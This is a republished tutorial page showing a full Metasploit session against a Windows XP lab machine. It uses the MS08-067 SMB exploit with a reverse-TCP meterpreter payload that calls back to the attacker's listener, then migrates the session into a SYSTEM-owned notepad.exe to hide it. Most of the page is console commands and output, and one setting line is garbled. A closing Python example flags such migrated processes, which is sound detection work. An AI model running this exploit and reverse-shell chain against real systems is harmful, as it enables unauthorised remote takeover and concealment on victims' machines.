Metasploit Migration Process

Source: Internet
Author: User
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142
RHOST => 192.168.1.142
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(ms08_067_netapi) > set target-target-+-
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.11:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 2 opened (192.168.1.11:4444 -> 192.168.1.142:1083) at 2013-04-27 13:15:56 -0400

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session     User                           Path
 ---   ----  ----               ----  -------     ----                           ----
 0     0     [System Process]         4294967295
 4     0     System             x86   0           NT AUTHORITY\SYSTEM
       704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 436   704   VMwareService.exe  x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\VMwareService.exe
 564   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 636   564   csrss.exe          x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 660   564   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 704   660   services.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 716   660   lsass.exe          x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 880   704   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 924   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 1004  704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\System32\svchost.exe
 1124  704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1212  704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1292  1536  conime.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\conime.exe
 1340  704   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 1488  704   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1596  1536  explorer.exe       x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\Explorer.EXE
 1672  704   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe
 1700  1596  VMwareTray.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1708  1596  VMwareUser.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 1772  1596  ctfmon.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\ctfmon.exe
 2024  1124  wscntfy.exe        x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\wscntfy.exe

meterpreter > run post/windows/manage/migrate

[*] Running module against ROOT-9743DD32E3
[*] Current server process: svchost.exe (1124)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1612
[+] Successfully migrated to process 1612

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session     User                           Path
 ---   ----  ----               ----  -------     ----                           ----
 0     0     [System Process]         4294967295
 4     0     System             x86   0           NT AUTHORITY\SYSTEM
       704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 436   704   VMwareService.exe  x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\VMwareService.exe
 564   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 636   564   csrss.exe          x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 660   564   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 704   660   services.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 716   660   lsass.exe          x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 880   704   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 924   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 1004  704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1124  704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1212  704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1292  1536  conime.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\conime.exe
 1340  704   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 1488  704   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1596  1536  explorer.exe       x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\explorer.exe
 1612  1124  notepad.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\notepad.exe
 1672  704   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe
 1700  1596  VMwareTray.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1708  1596  VMwareUser.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 1772  1596  ctfmon.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\ctfmon.exe
 2024  1124  wscntfy.exe        x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\wscntfy.exe

meterpreter >



Before the migration there was no notepad.exe process; after it, notepad.exe (PID 1612) appears in the process list and the session has migrated into it. On the XP machine, however, this process is only visible through Task Manager.



When Notepad is opened by the Administrator, this is what it looks like:

The difference is the user name: SYSTEM versus Administrator.
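
The difference noted above (the migration target runs as SYSTEM under svchost.exe, while Notepad opened by a user runs as Administrator) can be checked for in a process listing. The Python below is an added example, not part of the original page; the policy lists, the PID 3000 row, and the assumption that a user-opened Notepad has explorer.exe as its parent are constructed for illustration.

```python
import re

# Constructed sample: rows taken from the post-migration listing above, plus one
# constructed row (PID 3000) standing in for Notepad opened by the Administrator.
PS_OUTPUT = r"""
 704   660   services.exe  x86  0  NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe
 1124  704   svchost.exe   x86  0  NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 1596  1536  explorer.exe  x86  0  ROOT-9743DD32E3\Administrator  C:\WINDOWS\explorer.exe
 1612  1124  notepad.exe   x86  0  NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\notepad.exe
 3000  1596  notepad.exe   x86  0  ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\notepad.exe
"""

# Assumed policy lists for this example; tune them per environment.
INTERACTIVE_APPS = {"notepad.exe", "calc.exe", "mspaint.exe"}
SERVICE_ACCOUNTS = {"NT AUTHORITY\\SYSTEM", "NT AUTHORITY\\LOCAL SERVICE",
                    "NT AUTHORITY\\NETWORK SERVICE"}
USER_SHELLS = {"explorer.exe", "cmd.exe"}

def parse_ps(text):
    """Parse 'PID PPID Name Arch Session User Path' rows (columns split by 2+ spaces)."""
    procs = {}
    for line in text.splitlines():
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) < 6 or not cols[0].isdigit():
            continue  # header, separator, or row without a user column
        procs[int(cols[0])] = {"pid": int(cols[0]), "ppid": int(cols[1]), "name": cols[2],
                                "user": cols[5], "path": cols[6] if len(cols) > 6 else ""}
    return procs

def find_suspicious(procs):
    """Flag interactive apps running as a service account or spawned by a non-shell parent."""
    findings = []
    for p in procs.values():
        if p["name"].lower() not in INTERACTIVE_APPS:
            continue
        reasons = []
        if p["user"].upper() in SERVICE_ACCOUNTS:
            reasons.append("runs as " + p["user"])
        parent = procs.get(p["ppid"])
        parent_name = parent["name"].lower() if parent else "unknown"
        if parent_name not in USER_SHELLS:
            reasons.append("parent is " + parent_name)
        if reasons:
            findings.append((p["pid"], p["name"], reasons))
    return findings

if __name__ == "__main__":
    for pid, name, reasons in find_suspicious(parse_ps(PS_OUTPUT)):
        print(pid, name, "; ".join(reasons))
```

Only PID 1612 is reported; the Administrator-owned Notepad under explorer.exe passes both checks.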

